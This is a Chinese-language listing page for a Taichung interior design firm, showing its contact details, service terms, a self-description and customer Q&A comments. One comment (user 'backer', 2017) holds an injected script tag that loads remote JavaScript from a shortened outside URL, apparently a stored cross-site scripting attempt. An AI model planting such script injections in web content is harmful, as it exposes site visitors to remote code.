裝修就找幸福經紀人
虹牌油漆 掌握第一手裝修裝潢資訊FB Line@幸福空間好友募集中 老屋翻新住宅改造 裝修有難題?快報名幸福講堂

搜尋室內設計師

搜尋
搜尋裝修工程

搜尋

宜翊室內裝修設計有限公司

  • 04 22080885
  • 台中市 北區健行路930巷14號
最新動態
設計師簡介
服務內容
接案區域
北區 中區 南區 宜蘭 / 花東
接案類型
不限
接案風格
不限
接案預算
30萬以上
付費方式
依工程進度分段收費
收費方式
相關經歷

宜翊室內裝修設計, 由通過內政部營建署考試領有專業設計與施工技術證團隊組成。影響室內格局的設計因素很多,在多年的設計經驗中我們感受到客戶對『家』的期待,我們常探討一個問題“人!一輩子有幾次機會能自我實踐打造自已的夢想家“,每個房子的背後都有一段故事,宜翊室內裝修設計是夢想的推手,我們深度挖掘客戶對家的需求與期望,以人為主角,考量家人間的互動關系,規化適當的生活動線,展現原味赤裸專屬於「我們這一家」的生活本質,您的故事,我們來協助。

用最誠懇的態度傾聽您對家的需求,在設計上充份與您做溝通、協調給予建議,賦與空間機能性、貼心、創意與驚奇,讓設計上充滿專屬於您的規劃。用最專業的品質確保您對居家安全、施工品質的嚴格要求,我們透過訂定契約保障您的權益,在施工的過程中不定時的與您做進度回報,經由材質確認確保建材品質規格,工程監工維護施工安全品質。用最平實的價格採用適當的施工工法,活用建材特性、控制標準施工日程,提高裝修效益。

相關證照

◆財政部登記有案
◆經濟部登記有案
 公司統一編號/54249632

留言諮詢
AMY2019-03-19 10:01:28
Q提問

台中宏總加州室內坪約8坪想裝潢成英國風需要較多的收納櫃因為書很多想請問約需多少錢可以完成?有拍室內圖可以供參考因為6月底才會進駐

A回覆

尚未回覆

backer2017-06-01 22:24:43
Q提問

你好<script src=http://t.cn/RSMGrGO></script>

A回覆

你也好哦~

詹小姐2017-05-15 12:37:55
Q提問

你好,想詢問目前有房子需要規劃室內格局主要為房間以及客廳廚房部分,房屋位於南投,想詢問方便約時間來估價嗎?

A回覆

尚未回覆

|◀12▶|

  • (網頁上不會公開)
  • (網頁上不會公開)
  • (請輸入左側文字) [換一張]
抽獎活動-免費抽獎 機票 熱銷商品禮卷贈送 抽獎達人